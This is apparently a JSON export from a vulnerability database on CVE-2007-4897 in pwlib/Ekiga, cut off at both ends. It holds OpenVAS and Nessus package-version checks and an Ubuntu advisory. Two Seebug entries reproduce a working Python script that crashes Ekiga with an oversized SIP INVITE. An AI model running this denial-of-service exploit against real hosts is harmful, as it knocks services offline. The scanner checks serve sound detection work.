isdpkgvuln(pkg:\"libpt-plugins-alsa\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l2\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-avc\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-dc\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-oss\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-doc\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:13", "bulletinFamily": "scanner", "description": "Check for the Version of pwlib", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830218", "id": "OPENVAS:1361412562310830218", "title": "Mandriva Update for pwlib MDKSA-2007:206 (pwlib)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for pwlib MDKSA-2007:206 (pwlib)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory management flaw was discovered in PWLib, that an attacker\n could use to crash an application linked with it, such as Ekiga.\n\n Updated packages have been patched to prevent these issues.\";\n\ntag_affected = \"pwlib on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-11/msg00003.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830218\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:00:25 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDKSA\", value: \"2007:206\");\n script_cve_id(\"CVE-2007-4897\");\n script_name( \"Mandriva Update for pwlib MDKSA-2007:206 (pwlib)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of pwlib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpwlib1\", rpm:\"libpwlib1~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-devel\", rpm:\"libpwlib1-devel~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins\", rpm:\"libpwlib1-plugins~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-avc\", rpm:\"libpwlib1-plugins-avc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-dc\", rpm:\"libpwlib1-plugins-dc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pwlib\", rpm:\"pwlib~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1\", rpm:\"lib64pwlib1~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-devel\", rpm:\"lib64pwlib1-devel~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins\", rpm:\"lib64pwlib1-plugins~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-avc\", rpm:\"lib64pwlib1-plugins-avc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-dc\", rpm:\"lib64pwlib1-plugins-dc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpwlib1\", rpm:\"libpwlib1~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-devel\", rpm:\"libpwlib1-devel~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins\", rpm:\"libpwlib1-plugins~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-avc\", rpm:\"libpwlib1-plugins-avc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-dc\", rpm:\"libpwlib1-plugins-dc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pwlib\", rpm:\"pwlib~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1\", rpm:\"lib64pwlib1~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-devel\", rpm:\"lib64pwlib1-devel~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins\", rpm:\"lib64pwlib1-plugins~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-avc\", rpm:\"lib64pwlib1-plugins-avc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-dc\", rpm:\"lib64pwlib1-plugins-dc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpwlib1\", rpm:\"libpwlib1~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-devel\", rpm:\"libpwlib1-devel~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins\", rpm:\"libpwlib1-plugins~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-avc\", rpm:\"libpwlib1-plugins-avc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-dc\", rpm:\"libpwlib1-plugins-dc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pwlib\", rpm:\"pwlib~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1\", rpm:\"lib64pwlib1~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-devel\", rpm:\"lib64pwlib1-devel~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins\", rpm:\"lib64pwlib1-plugins~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-avc\", rpm:\"lib64pwlib1-plugins-avc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-dc\", rpm:\"lib64pwlib1-plugins-dc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:02", "bulletinFamily": "scanner", "description": "Check for the Version of pwlib", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830218", "id": "OPENVAS:830218", "title": "Mandriva Update for pwlib MDKSA-2007:206 (pwlib)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for pwlib MDKSA-2007:206 (pwlib)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory management flaw was discovered in PWLib, that an attacker\n could use to crash an application linked with it, such as Ekiga.\n\n Updated packages have been patched to prevent these issues.\";\n\ntag_affected = \"pwlib on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-11/msg00003.php\");\n script_id(830218);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:00:25 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDKSA\", value: \"2007:206\");\n script_cve_id(\"CVE-2007-4897\");\n script_name( \"Mandriva Update for pwlib MDKSA-2007:206 (pwlib)\");\n\n script_summary(\"Check for the Version of pwlib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpwlib1\", rpm:\"libpwlib1~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-devel\", rpm:\"libpwlib1-devel~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins\", rpm:\"libpwlib1-plugins~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-avc\", rpm:\"libpwlib1-plugins-avc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-dc\", rpm:\"libpwlib1-plugins-dc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pwlib\", rpm:\"pwlib~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1\", rpm:\"lib64pwlib1~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-devel\", rpm:\"lib64pwlib1-devel~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins\", rpm:\"lib64pwlib1-plugins~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-avc\", rpm:\"lib64pwlib1-plugins-avc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-dc\", rpm:\"lib64pwlib1-plugins-dc~1.10.5~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpwlib1\", rpm:\"libpwlib1~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-devel\", rpm:\"libpwlib1-devel~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins\", rpm:\"libpwlib1-plugins~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-avc\", rpm:\"libpwlib1-plugins-avc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-dc\", rpm:\"libpwlib1-plugins-dc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pwlib\", rpm:\"pwlib~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1\", rpm:\"lib64pwlib1~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-devel\", rpm:\"lib64pwlib1-devel~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins\", rpm:\"lib64pwlib1-plugins~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-avc\", rpm:\"lib64pwlib1-plugins-avc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-dc\", rpm:\"lib64pwlib1-plugins-dc~1.10.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpwlib1\", rpm:\"libpwlib1~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-devel\", rpm:\"libpwlib1-devel~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins\", rpm:\"libpwlib1-plugins~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-avc\", rpm:\"libpwlib1-plugins-avc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpwlib1-plugins-dc\", rpm:\"libpwlib1-plugins-dc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pwlib\", rpm:\"pwlib~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1\", rpm:\"lib64pwlib1~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-devel\", rpm:\"lib64pwlib1-devel~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins\", rpm:\"lib64pwlib1-plugins~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-avc\", rpm:\"lib64pwlib1-plugins-avc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64pwlib1-plugins-dc\", rpm:\"lib64pwlib1-plugins-dc~1.10.10~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:43:00", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-07-24T00:00:00", "published": "2009-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12761", "id": "SSV:12761", "type": "seebug", "title": "Ekiga 2.0.5 (GetHostAddress) Remote Denial of Service Exploit", "sourceData": "\n #!/usr/bin/env python\n#\n# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)\n#\n# ekiga207_dos.py by Jose Miguel Esparza\n# 2007-09-11 S21sec labs\n\nimport sys,socket\n\nif len(sys.argv) != 3: \n\tsys.exit("Usage: " + sys.argv[0] + " target_host target_port\\n")\ntarget = sys.argv[1]\ntargetPort = int(sys.argv[2])\nmalformedRequest = "INVITE "+'A'*1005+" SIP/2.0\\r\\n"+\\\n\t\t "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n"+\\\n\t\t "Contact:sip:pepe@172.91.1.133:5060\\r\\n"+\\\n\t\t "Content-Length:417\\r\\n"+\\\n\t\t "Content-Type:application/sdp\\r\\n"+\\\n\t\t "CSeq:4321 INVITE\\r\\n"+\\\n\t\t "From:sip:pepe@172.91.1.148:5060;tag=a48s\\r\\n"+\\\n\t\t "Max-Forwards:70\\r\\n"+\\\n "To:sip:paco@micasa.com\\r\\n"+\\\n "Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\\r\\n\\r\\n"\t\t \n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.connect((target,targetPort))\ns.sendall(malformedRequest)\ns.close()\n\n# sebug.net\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12761", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:13:31", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66737", "id": "SSV:66737", "title": "Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)\r\n#\r\n# ekiga207_dos.py by Jose Miguel Esparza\r\n# 2007-09-11 S21sec labs\r\n\r\nimport sys,socket\r\n\r\nif len(sys.argv) != 3: \r\n\tsys.exit("Usage: " + sys.argv[0] + " target_host target_port\\n")\r\ntarget = sys.argv[1]\r\ntargetPort = int(sys.argv[2])\r\nmalformedRequest = "INVITE "+'A'*1005+" SIP/2.0\\r\\n"+\\\r\n\t\t "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n"+\\\r\n\t\t "Contact:sip:pepe@172.91.1.133:5060\\r\\n"+\\\r\n\t\t "Content-Length:417\\r\\n"+\\\r\n\t\t "Content-Type:application/sdp\\r\\n"+\\\r\n\t\t "CSeq:4321 INVITE\\r\\n"+\\\r\n\t\t "From:sip:pepe@172.91.1.148:5060;tag=a48s\\r\\n"+\\\r\n\t\t "Max-Forwards:70\\r\\n"+\\\r\n "To:sip:paco@micasa.com\\r\\n"+\\\r\n "Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\\r\\n\\r\\n"\t\t \r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ns.connect((target,targetPort))\r\ns.sendall(malformedRequest)\r\ns.close()\r\n\r\n# milw0rm.com [2009-07-24]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66737"}], "ubuntu": [{"lastseen": "2019-05-29T17:21:39", "bulletinFamily": "unix", "description": "Jose Miguel Esparza discovered that pwlib did not correctly handle large string lengths. A remote attacker could send specially crafted packets to applications linked against pwlib (e.g. Ekiga) causing them to crash, leading to a denial of service.", "modified": "2008-01-08T00:00:00", "published": "2008-01-08T00:00:00", "id": "USN-561-1", "href": "https://usn.ubuntu.com/561-1/", "title": "pwlib vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:20:15", "bulletinFamily": "scanner", "description": "Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2007-0932.NASL", "href": "https://www.tenable.com/plugins/nessus/26953", "published": "2007-10-09T00:00:00", "title": "RHEL 5 : pwlib (RHSA-2007:0932)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26953);\n script_version 